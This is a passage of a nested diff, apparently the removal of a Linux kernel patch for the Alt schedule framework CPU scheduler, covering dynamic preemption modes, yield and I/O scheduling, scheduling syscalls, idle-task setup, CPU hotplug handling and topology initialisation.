-+#else
-+#error "Unsupported PREEMPT_DYNAMIC mechanism"
-+#endif
-+
-+void sched_dynamic_update(int mode)
-+{
-+	/*
-+	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
-+	 * the ZERO state, which is invalid.
-+	 */
-+	preempt_dynamic_enable(cond_resched);
-+	preempt_dynamic_enable(might_resched);
-+	preempt_dynamic_enable(preempt_schedule);
-+	preempt_dynamic_enable(preempt_schedule_notrace);
-+	preempt_dynamic_enable(irqentry_exit_cond_resched);
-+
-+	switch (mode) {
-+	case preempt_dynamic_none:
-+		preempt_dynamic_enable(cond_resched);
-+		preempt_dynamic_disable(might_resched);
-+		preempt_dynamic_disable(preempt_schedule);
-+		preempt_dynamic_disable(preempt_schedule_notrace);
-+		preempt_dynamic_disable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: none\n");
-+		break;
-+
-+	case preempt_dynamic_voluntary:
-+		preempt_dynamic_enable(cond_resched);
-+		preempt_dynamic_enable(might_resched);
-+		preempt_dynamic_disable(preempt_schedule);
-+		preempt_dynamic_disable(preempt_schedule_notrace);
-+		preempt_dynamic_disable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: voluntary\n");
-+		break;
-+
-+	case preempt_dynamic_full:
-+		preempt_dynamic_disable(cond_resched);
-+		preempt_dynamic_disable(might_resched);
-+		preempt_dynamic_enable(preempt_schedule);
-+		preempt_dynamic_enable(preempt_schedule_notrace);
-+		preempt_dynamic_enable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: full\n");
-+		break;
-+	}
-+
-+	preempt_dynamic_mode = mode;
-+}
-+
-+static int __init setup_preempt_mode(char *str)
-+{
-+	int mode = sched_dynamic_mode(str);
-+	if (mode < 0) {
-+		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
-+		return 0;
-+	}
-+
-+	sched_dynamic_update(mode);
-+	return 1;
-+}
-+__setup("preempt=", setup_preempt_mode);
-+
-+static void __init preempt_dynamic_init(void)
-+{
-+	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
-+		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
-+			sched_dynamic_update(preempt_dynamic_none);
-+		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
-+			sched_dynamic_update(preempt_dynamic_voluntary);
-+		} else {
-+			/* Default static call setting, nothing to do */
-+			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
-+			preempt_dynamic_mode = preempt_dynamic_full;
-+			pr_info("Dynamic Preempt: full\n");
-+		}
-+	}
-+}
-+
-+#define PREEMPT_MODEL_ACCESSOR(mode) \
-+	bool preempt_model_##mode(void)						 \
-+	{									 \
-+		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
-+		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
-+	}									 \
-+	EXPORT_SYMBOL_GPL(preempt_model_##mode)
-+
-+PREEMPT_MODEL_ACCESSOR(none);
-+PREEMPT_MODEL_ACCESSOR(voluntary);
-+PREEMPT_MODEL_ACCESSOR(full);
-+
-+#else /* !CONFIG_PREEMPT_DYNAMIC */
-+
-+static inline void preempt_dynamic_init(void) { }
-+
-+#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
-+
-+/**
-+ * yield - yield the current processor to other threads.
-+ *
-+ * Do not ever use this function, there's a 99% chance you're doing it wrong.
-+ *
-+ * The scheduler is at all times free to pick the calling task as the most
-+ * eligible task to run, if removing the yield() call from your code breaks
-+ * it, it's already broken.
-+ *
-+ * Typical broken usage is:
-+ *
-+ * while (!event)
-+ * 	yield();
-+ *
-+ * where one assumes that yield() will let 'the other' process run that will
-+ * make event true. If the current task is a SCHED_FIFO task that will never
-+ * happen. Never use yield() as a progress guarantee!!
-+ *
-+ * If you want to use yield() to wait for something, use wait_event().
-+ * If you want to use yield() to be 'nice' for others, use cond_resched().
-+ * If you still want to use yield(), do not!
-+ */
-+void __sched yield(void)
-+{
-+	set_current_state(TASK_RUNNING);
-+	do_sched_yield();
-+}
-+EXPORT_SYMBOL(yield);
-+
-+/**
-+ * yield_to - yield the current processor to another thread in
-+ * your thread group, or accelerate that thread toward the
-+ * processor it's on.
-+ * @p: target task
-+ * @preempt: whether task preemption is allowed or not
-+ *
-+ * It's the caller's job to ensure that the target task struct
-+ * can't go away on us before we can do any checks.
-+ *
-+ * In Alt schedule FW, yield_to is not supported.
-+ *
-+ * Return:
-+ *	true (>0) if we indeed boosted the target task.
-+ *	false (0) if we failed to boost the target.
-+ *	-ESRCH if there's no task to yield to.
-+ */
-+int __sched yield_to(struct task_struct *p, bool preempt)
-+{
-+	return 0;
-+}
-+EXPORT_SYMBOL_GPL(yield_to);
-+
-+int io_schedule_prepare(void)
-+{
-+	int old_iowait = current->in_iowait;
-+
-+	current->in_iowait = 1;
-+	blk_flush_plug(current->plug, true);
-+	return old_iowait;
-+}
-+
-+void io_schedule_finish(int token)
-+{
-+	current->in_iowait = token;
-+}
-+
-+/*
-+ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
-+ * that process accounting knows that this is a task in IO wait state.
-+ *
-+ * But don't do that if it is a deliberate, throttling IO wait (this task
-+ * has set its backing_dev_info: the queue against which it should throttle)
-+ */
-+
-+long __sched io_schedule_timeout(long timeout)
-+{
-+	int token;
-+	long ret;
-+
-+	token = io_schedule_prepare();
-+	ret = schedule_timeout(timeout);
-+	io_schedule_finish(token);
-+
-+	return ret;
-+}
-+EXPORT_SYMBOL(io_schedule_timeout);
-+
-+void __sched io_schedule(void)
-+{
-+	int token;
-+
-+	token = io_schedule_prepare();
-+	schedule();
-+	io_schedule_finish(token);
-+}
-+EXPORT_SYMBOL(io_schedule);
-+
-+/**
-+ * sys_sched_get_priority_max - return maximum RT priority.
-+ * @policy: scheduling class.
-+ *
-+ * Return: On success, this syscall returns the maximum
-+ * rt_priority that can be used by a given scheduling class.
-+ * On failure, a negative error code is returned.
-+ */
-+SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
-+{
-+	int ret = -EINVAL;
-+
-+	switch (policy) {
-+	case SCHED_FIFO:
-+	case SCHED_RR:
-+		ret = MAX_RT_PRIO - 1;
-+		break;
-+	case SCHED_NORMAL:
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		ret = 0;
-+		break;
-+	}
-+	return ret;
-+}
-+
-+/**
-+ * sys_sched_get_priority_min - return minimum RT priority.
-+ * @policy: scheduling class.
-+ *
-+ * Return: On success, this syscall returns the minimum
-+ * rt_priority that can be used by a given scheduling class.
-+ * On failure, a negative error code is returned.
-+ */
-+SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
-+{
-+	int ret = -EINVAL;
-+
-+	switch (policy) {
-+	case SCHED_FIFO:
-+	case SCHED_RR:
-+		ret = 1;
-+		break;
-+	case SCHED_NORMAL:
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		ret = 0;
-+		break;
-+	}
-+	return ret;
-+}
-+
-+static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
-+{
-+	struct task_struct *p;
-+	int retval;
-+
-+	alt_sched_debug();
-+
-+	if (pid < 0)
-+		return -EINVAL;
-+
-+	retval = -ESRCH;
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+	rcu_read_unlock();
-+
-+	*t = ns_to_timespec64(sched_timeslice_ns);
-+	return 0;
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_rr_get_interval - return the default timeslice of a process.
-+ * @pid: pid of the process.
-+ * @interval: userspace pointer to the timeslice value.
-+ *
-+ *
-+ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
-+ * an error code.
-+ */
-+SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
-+		struct __kernel_timespec __user *, interval)
-+{
-+	struct timespec64 t;
-+	int retval = sched_rr_get_interval(pid, &t);
-+
-+	if (retval == 0)
-+		retval = put_timespec64(&t, interval);
-+
-+	return retval;
-+}
-+
-+#ifdef CONFIG_COMPAT_32BIT_TIME
-+SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
-+		struct old_timespec32 __user *, interval)
-+{
-+	struct timespec64 t;
-+	int retval = sched_rr_get_interval(pid, &t);
-+
-+	if (retval == 0)
-+		retval = put_old_timespec32(&t, interval);
-+	return retval;
-+}
-+#endif
-+
-+void sched_show_task(struct task_struct *p)
-+{
-+	unsigned long free = 0;
-+	int ppid;
-+
-+	if (!try_get_task_stack(p))
-+		return;
-+
-+	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
-+
-+	if (task_is_running(p))
-+		pr_cont("  running task    ");
-+#ifdef CONFIG_DEBUG_STACK_USAGE
-+	free = stack_not_used(p);
-+#endif
-+	ppid = 0;
-+	rcu_read_lock();
-+	if (pid_alive(p))
-+		ppid = task_pid_nr(rcu_dereference(p->real_parent));
-+	rcu_read_unlock();
-+	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
-+		free, task_pid_nr(p), ppid,
-+		read_task_thread_flags(p));
-+
-+	print_worker_info(KERN_INFO, p);
-+	print_stop_info(KERN_INFO, p);
-+	show_stack(p, NULL, KERN_INFO);
-+	put_task_stack(p);
-+}
-+EXPORT_SYMBOL_GPL(sched_show_task);
-+
-+static inline bool
-+state_filter_match(unsigned long state_filter, struct task_struct *p)
-+{
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/* no filter, everything matches */
-+	if (!state_filter)
-+		return true;
-+
-+	/* filter, but doesn't match */
-+	if (!(state & state_filter))
-+		return false;
-+
-+	/*
-+	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
-+	 * TASK_KILLABLE).
-+	 */
-+	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
-+		return false;
-+
-+	return true;
-+}
-+
-+
-+void show_state_filter(unsigned int state_filter)
-+{
-+	struct task_struct *g, *p;
-+
-+	rcu_read_lock();
-+	for_each_process_thread(g, p) {
-+		/*
-+		 * reset the NMI-timeout, listing all files on a slow
-+		 * console might take a lot of time:
-+		 * Also, reset softlockup watchdogs on all CPUs, because
-+		 * another CPU might be blocked waiting for us to process
-+		 * an IPI.
-+		 */
-+		touch_nmi_watchdog();
-+		touch_all_softlockup_watchdogs();
-+		if (state_filter_match(state_filter, p))
-+			sched_show_task(p);
-+	}
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+	/* TODO: Alt schedule FW should support this
-+	if (!state_filter)
-+		sysrq_sched_debug_show();
-+	*/
-+#endif
-+	rcu_read_unlock();
-+	/*
-+	 * Only show locks if all tasks are dumped:
-+	 */
-+	if (!state_filter)
-+		debug_show_all_locks();
-+}
-+
-+void dump_cpu_task(int cpu)
-+{
-+	if (cpu == smp_processor_id() && in_hardirq()) {
-+		struct pt_regs *regs;
-+
-+		regs = get_irq_regs();
-+		if (regs) {
-+			show_regs(regs);
-+			return;
-+		}
-+	}
-+
-+	if (trigger_single_cpu_backtrace(cpu))
-+		return;
-+
-+	pr_info("Task dump for CPU %d:\n", cpu);
-+	sched_show_task(cpu_curr(cpu));
-+}
-+
-+/**
-+ * init_idle - set up an idle thread for a given CPU
-+ * @idle: task in question
-+ * @cpu: CPU the idle task belongs to
-+ *
-+ * NOTE: this function does not set the idle thread's NEED_RESCHED
-+ * flag, to make booting more robust.
-+ */
-+void __init init_idle(struct task_struct *idle, int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	__sched_fork(0, idle);
-+
-+	raw_spin_lock_irqsave(&idle->pi_lock, flags);
-+	raw_spin_lock(&rq->lock);
-+
-+	idle->last_ran = rq->clock_task;
-+	idle->__state = TASK_RUNNING;
-+	/*
-+	 * PF_KTHREAD should already be set at this point; regardless, make it
-+	 * look like a proper per-CPU kthread.
-+	 */
-+	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
-+	kthread_set_per_cpu(idle, cpu);
-+
-+	sched_queue_init_idle(&rq->queue, idle);
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * It's possible that init_idle() gets called multiple times on a task,
-+	 * in that case do_set_cpus_allowed() will not do the right thing.
-+	 *
-+	 * And since this is boot we can forgo the serialisation.
-+	 */
-+	set_cpus_allowed_common(idle, cpumask_of(cpu));
-+#endif
-+
-+	/* Silence PROVE_RCU */
-+	rcu_read_lock();
-+	__set_task_cpu(idle, cpu);
-+	rcu_read_unlock();
-+
-+	rq->idle = idle;
-+	rcu_assign_pointer(rq->curr, idle);
-+	idle->on_cpu = 1;
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
-+
-+	/* Set the preempt count _outside_ the spinlocks! */
-+	init_idle_preempt_count(idle, cpu);
-+
-+	ftrace_graph_init_idle_task(idle, cpu);
-+	vtime_init_idle(idle, cpu);
-+#ifdef CONFIG_SMP
-+	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
-+#endif
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
-+			      const struct cpumask __maybe_unused *trial)
-+{
-+	return 1;
-+}
-+
-+int task_can_attach(struct task_struct *p,
-+		    const struct cpumask *cs_effective_cpus)
-+{
-+	int ret = 0;
-+
-+	/*
-+	 * Kthreads which disallow setaffinity shouldn't be moved
-+	 * to a new cpuset; we don't want to change their CPU
-+	 * affinity and isolating such threads by their set of
-+	 * allowed nodes is unnecessary.  Thus, cpusets are not
-+	 * applicable for such threads.  This prevents checking for
-+	 * success of set_cpus_allowed_ptr() on all attached tasks
-+	 * before cpus_mask may be changed.
-+	 */
-+	if (p->flags & PF_NO_SETAFFINITY)
-+		ret = -EINVAL;
-+
-+	return ret;
-+}
-+
-+bool sched_smp_initialized __read_mostly;
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+/*
-+ * Ensures that the idle task is using init_mm right before its CPU goes
-+ * offline.
-+ */
-+void idle_task_exit(void)
-+{
-+	struct mm_struct *mm = current->active_mm;
-+
-+	BUG_ON(current != this_rq()->idle);
-+
-+	if (mm != &init_mm) {
-+		switch_mm(mm, &init_mm, current);
-+		finish_arch_post_lock_switch();
-+	}
-+
-+	/* finish_cpu(), as ran on the BP, will clean up the active_mm state */
-+}
-+
-+static int __balance_push_cpu_stop(void *arg)
-+{
-+	struct task_struct *p = arg;
-+	struct rq *rq = this_rq();
-+	struct rq_flags rf;
-+	int cpu;
-+
-+	raw_spin_lock_irq(&p->pi_lock);
-+	rq_lock(rq, &rf);
-+
-+	update_rq_clock(rq);
-+
-+	if (task_rq(p) == rq && task_on_rq_queued(p)) {
-+		cpu = select_fallback_rq(rq->cpu, p);
-+		rq = __migrate_task(rq, p, cpu);
-+	}
-+
-+	rq_unlock(rq, &rf);
-+	raw_spin_unlock_irq(&p->pi_lock);
-+
-+	put_task_struct(p);
-+
-+	return 0;
-+}
-+
-+static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
-+
-+/*
-+ * This is enabled below SCHED_AP_ACTIVE; when !cpu_active(), but only
-+ * effective when the hotplug motion is down.
-+ */
-+static void balance_push(struct rq *rq)
-+{
-+	struct task_struct *push_task = rq->curr;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*
-+	 * Ensure the thing is persistent until balance_push_set(.on = false);
-+	 */
-+	rq->balance_callback = &balance_push_callback;
-+
-+	/*
-+	 * Only active while going offline and when invoked on the outgoing
-+	 * CPU.
-+	 */
-+	if (!cpu_dying(rq->cpu) || rq != this_rq())
-+		return;
-+
-+	/*
-+	 * Both the cpu-hotplug and stop task are in this case and are
-+	 * required to complete the hotplug process.
-+	 */
-+	if (kthread_is_per_cpu(push_task) ||
-+	    is_migration_disabled(push_task)) {
-+
-+		/*
-+		 * If this is the idle task on the outgoing CPU try to wake
-+		 * up the hotplug control thread which might wait for the
-+		 * last task to vanish. The rcuwait_active() check is
-+		 * accurate here because the waiter is pinned on this CPU
-+		 * and can't obviously be running in parallel.
-+		 *
-+		 * On RT kernels this also has to check whether there are
-+		 * pinned and scheduled out tasks on the runqueue. They
-+		 * need to leave the migrate disabled section first.
-+		 */
-+		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
-+		    rcuwait_active(&rq->hotplug_wait)) {
-+			raw_spin_unlock(&rq->lock);
-+			rcuwait_wake_up(&rq->hotplug_wait);
-+			raw_spin_lock(&rq->lock);
-+		}
-+		return;
-+	}
-+
-+	get_task_struct(push_task);
-+	/*
-+	 * Temporarily drop rq->lock such that we can wake-up the stop task.
-+	 * Both preemption and IRQs are still disabled.
-+	 */
-+	raw_spin_unlock(&rq->lock);
-+	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
-+			    this_cpu_ptr(&push_work));
-+	/*
-+	 * At this point need_resched() is true and we'll take the loop in
-+	 * schedule(). The next pick is obviously going to be the stop task
-+	 * which kthread_is_per_cpu() and will push this task away.
-+	 */
-+	raw_spin_lock(&rq->lock);
-+}
-+
-+static void balance_push_set(int cpu, bool on)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	struct rq_flags rf;
-+
-+	rq_lock_irqsave(rq, &rf);
-+	if (on) {
-+		WARN_ON_ONCE(rq->balance_callback);
-+		rq->balance_callback = &balance_push_callback;
-+	} else if (rq->balance_callback == &balance_push_callback) {
-+		rq->balance_callback = NULL;
-+	}
-+	rq_unlock_irqrestore(rq, &rf);
-+}
-+
-+/*
-+ * Invoked from a CPUs hotplug control thread after the CPU has been marked
-+ * inactive. All tasks which are not per CPU kernel threads are either
-+ * pushed off this CPU now via balance_push() or placed on a different CPU
-+ * during wakeup. Wait until the CPU is quiescent.
-+ */
-+static void balance_hotplug_wait(void)
-+{
-+	struct rq *rq = this_rq();
-+
-+	rcuwait_wait_event(&rq->hotplug_wait,
-+			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
-+			   TASK_UNINTERRUPTIBLE);
-+}
-+
-+#else
-+
-+static void balance_push(struct rq *rq)
-+{
-+}
-+
-+static void balance_push_set(int cpu, bool on)
-+{
-+}
-+
-+static inline void balance_hotplug_wait(void)
-+{
-+}
-+#endif /* CONFIG_HOTPLUG_CPU */
-+
-+static void set_rq_offline(struct rq *rq)
-+{
-+	if (rq->online)
-+		rq->online = false;
-+}
-+
-+static void set_rq_online(struct rq *rq)
-+{
-+	if (!rq->online)
-+		rq->online = true;
-+}
-+
-+/*
-+ * used to mark begin/end of suspend/resume:
-+ */
-+static int num_cpus_frozen;
-+
-+/*
-+ * Update cpusets according to cpu_active mask.  If cpusets are
-+ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
-+ * around partition_sched_domains().
-+ *
-+ * If we come here as part of a suspend/resume, don't touch cpusets because we
-+ * want to restore it back to its original state upon resume anyway.
-+ */
-+static void cpuset_cpu_active(void)
-+{
-+	if (cpuhp_tasks_frozen) {
-+		/*
-+		 * num_cpus_frozen tracks how many CPUs are involved in suspend
-+		 * resume sequence. As long as this is not the last online
-+		 * operation in the resume sequence, just build a single sched
-+		 * domain, ignoring cpusets.
-+		 */
-+		partition_sched_domains(1, NULL, NULL);
-+		if (--num_cpus_frozen)
-+			return;
-+		/*
-+		 * This is the last CPU online operation. So fall through and
-+		 * restore the original sched domains by considering the
-+		 * cpuset configurations.
-+		 */
-+		cpuset_force_rebuild();
-+	}
-+
-+	cpuset_update_active_cpus();
-+}
-+
-+static int cpuset_cpu_inactive(unsigned int cpu)
-+{
-+	if (!cpuhp_tasks_frozen) {
-+		cpuset_update_active_cpus();
-+	} else {
-+		num_cpus_frozen++;
-+		partition_sched_domains(1, NULL, NULL);
-+	}
-+	return 0;
-+}
-+
-+int sched_cpu_activate(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	/*
-+	 * Clear the balance_push callback and prepare to schedule
-+	 * regular tasks.
-+	 */
-+	balance_push_set(cpu, false);
-+
-+#ifdef CONFIG_SCHED_SMT
-+	/*
-+	 * When going up, increment the number of cores with SMT present.
-+	 */
-+	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
-+		static_branch_inc_cpuslocked(&sched_smt_present);
-+#endif
-+	set_cpu_active(cpu, true);
-+
-+	if (sched_smp_initialized)
-+		cpuset_cpu_active();
-+
-+	/*
-+	 * Put the rq online, if not already. This happens:
-+	 *
-+	 * 1) In the early boot process, because we build the real domains
-+	 *    after all cpus have been brought up.
-+	 *
-+	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
-+	 *    domains.
-+	 */
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	set_rq_online(rq);
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	return 0;
-+}
-+
-+int sched_cpu_deactivate(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+	int ret;
-+
-+	set_cpu_active(cpu, false);
-+
-+	/*
-+	 * From this point forward, this CPU will refuse to run any task that
-+	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
-+	 * push those tasks away until this gets cleared, see
-+	 * sched_cpu_dying().
-+	 */
-+	balance_push_set(cpu, true);
-+
-+	/*
-+	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
-+	 * users of this state to go away such that all new such users will
-+	 * observe it.
-+	 *
-+	 * Specifically, we rely on ttwu to no longer target this CPU, see
-+	 * ttwu_queue_cond() and is_cpu_allowed().
-+	 *
-+	 * Do sync before park smpboot threads to take care the rcu boost case.
-+	 */
-+	synchronize_rcu();
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	update_rq_clock(rq);
-+	set_rq_offline(rq);
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+#ifdef CONFIG_SCHED_SMT
-+	/*
-+	 * When going down, decrement the number of cores with SMT present.
-+	 */
-+	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
-+		static_branch_dec_cpuslocked(&sched_smt_present);
-+		if (!static_branch_likely(&sched_smt_present))
-+			cpumask_clear(&sched_sg_idle_mask);
-+	}
-+#endif
-+
-+	if (!sched_smp_initialized)
-+		return 0;
-+
-+	ret = cpuset_cpu_inactive(cpu);
-+	if (ret) {
-+		balance_push_set(cpu, false);
-+		set_cpu_active(cpu, true);
-+		return ret;
-+	}
-+
-+	return 0;
-+}
-+
-+static void sched_rq_cpu_starting(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	rq->calc_load_update = calc_load_update;
-+}
-+
-+int sched_cpu_starting(unsigned int cpu)
-+{
-+	sched_rq_cpu_starting(cpu);
-+	sched_tick_start(cpu);
-+	return 0;
-+}
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+
-+/*
-+ * Invoked immediately before the stopper thread is invoked to bring the
-+ * CPU down completely. At this point all per CPU kthreads except the
-+ * hotplug thread (current) and the stopper thread (inactive) have been
-+ * either parked or have been unbound from the outgoing CPU. Ensure that
-+ * any of those which might be on the way out are gone.
-+ *
-+ * If after this point a bound task is being woken on this CPU then the
-+ * responsible hotplug callback has failed to do it's job.
-+ * sched_cpu_dying() will catch it with the appropriate fireworks.
-+ */
-+int sched_cpu_wait_empty(unsigned int cpu)
-+{
-+	balance_hotplug_wait();
-+	return 0;
-+}
-+
-+/*
-+ * Since this CPU is going 'away' for a while, fold any nr_active delta we
-+ * might have. Called from the CPU stopper task after ensuring that the
-+ * stopper is the last running task on the CPU, so nr_active count is
-+ * stable. We need to take the teardown thread which is calling this into
-+ * account, so we hand in adjust = 1 to the load calculation.
-+ *
-+ * Also see the comment "Global load-average calculations".
-+ */
-+static void calc_load_migrate(struct rq *rq)
-+{
-+	long delta = calc_load_fold_active(rq, 1);
-+
-+	if (delta)
-+		atomic_long_add(delta, &calc_load_tasks);
-+}
-+
-+static void dump_rq_tasks(struct rq *rq, const char *loglvl)
-+{
-+	struct task_struct *g, *p;
-+	int cpu = cpu_of(rq);
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
-+	for_each_process_thread(g, p) {
-+		if (task_cpu(p) != cpu)
-+			continue;
-+
-+		if (!task_on_rq_queued(p))
-+			continue;
-+
-+		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
-+	}
-+}
-+
-+int sched_cpu_dying(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	/* Handle pending wakeups and then migrate everything off */
-+	sched_tick_stop(cpu);
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
-+		WARN(true, "Dying CPU not properly vacated!");
-+		dump_rq_tasks(rq, KERN_WARNING);
-+	}
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	calc_load_migrate(rq);
-+	hrtick_clear(rq);
-+	return 0;
-+}
-+#endif
-+
-+#ifdef CONFIG_SMP
-+static void sched_init_topology_cpumask_early(void)
-+{
-+	int cpu;
-+	cpumask_t *tmp;
-+
-+	for_each_possible_cpu(cpu) {
-+		/* init topo masks */
-+		tmp = per_cpu(sched_cpu_topo_masks, cpu);
-+
-+		cpumask_copy(tmp, cpumask_of(cpu));
-+		tmp++;
-+		cpumask_copy(tmp, cpu_possible_mask);
-+		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
-+		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
-+		/*per_cpu(sd_llc_id, cpu) = cpu;*/
-+	}
-+}
-+
-+#define TOPOLOGY_CPUMASK(name, mask, last)\
-+	if (cpumask_and(topo, topo, mask)) {					\
-+		cpumask_copy(topo, mask);					\
-+		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
-+		       cpu, (topo++)->bits[0]);					\
-+	}									\
-+	if (!last)								\
-+		cpumask_complement(topo, mask)
-+
-+static void sched_init_topology_cpumask(void)
-+{
-+	int cpu;
-+	cpumask_t *topo;
-+
-+	for_each_online_cpu(cpu) {
-+		/* take chance to reset time slice for idle tasks */
-+		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
-+
-+		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+
-+		cpumask_complement(topo, cpumask_of(cpu));
-+#ifdef CONFIG_SCHED_SMT
-+		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
-+#endif
-+		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
-+		per_cpu(sched_cpu_llc_mask, cpu) = topo;
-+		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
-+
-+		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
-+
-+		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
-+
-+		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
-+		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
-+		       cpu, per_cpu(sd_llc_id, cpu),
-+		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
-+			      per_cpu(sched_cpu_topo_masks, cpu)));
-+	}
-+}
-+#endif
-+
-+void __init sched_init_smp(void)
-+{
-+	/* Move init over to a non-isolated CPU */
-+	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
-+		BUG();
-+	current->flags &= ~PF_NO_SETAFFINITY;
-+
-+	sched_init_topology_cpumask();
-+
-+	sched_smp_initialized = true;
-+}
-+
-+static int __init migration_init(void)
-+{
-+	sched_cpu_starting(smp_processor_id());
-+	return 0;
-+}
-+early_initcall(migration_init);
-+
-+#else
-+void __init sched_init_smp(void)
-+{
-+	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
-+}
-+#endif /* CONFIG_SMP */
-+
-+int in_sched_functions(unsigned long addr)
-+{
-+	return in_lock_functions(addr) ||
-+		(addr >= (unsigned long)__sched_text_start
-+		&& addr < (unsigned long)__sched_text_end);
-+}
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+/* task group related information */
-+struct task_group {
-+	struct cgroup_subsys_state css;
-+
-+	struct rcu_head rcu;
-+	struct list_head list;
-+
-+	struct task_group *parent;
-+	struct list_head siblings;
-+	struct list_head children;
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+	unsigned long		shares;
-+#endif
-+};
-+
-+/*
-+ * Default task group.
-+ * Every task in system belongs to this group at bootup.
-+ */
-+struct task_group root_task_group;
-+LIST_HEAD(task_groups);
-+
-+/* Cacheline aligned slab cache for task_group */
-+static struct kmem_cache *task_group_cache __read_mostly;
-+#endif /* CONFIG_CGROUP_SCHED */
-+
-+void __init sched_init(void)
-+{
-+	int i;
-+	struct rq *rq;
-+
-+	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
-+
-+	wait_bit_init();
-+
-+#ifdef CONFIG_SMP
-+	for (i = 0; i < SCHED_QUEUE_BITS; i++)
-+		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
-+#endif
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+	task_group_cache = KMEM_CACHE(task_group, 0);
-+
-+	list_add(&root_task_group.list, &task_groups);
-+	INIT_LIST_HEAD(&root_task_group.children);
-+	INIT_LIST_HEAD(&root_task_group.siblings);
-+#endif /* CONFIG_CGROUP_SCHED */
-+	for_each_possible_cpu(i) {
-+		rq = cpu_rq(i);
-+
-+		sched_queue_init(&rq->queue);
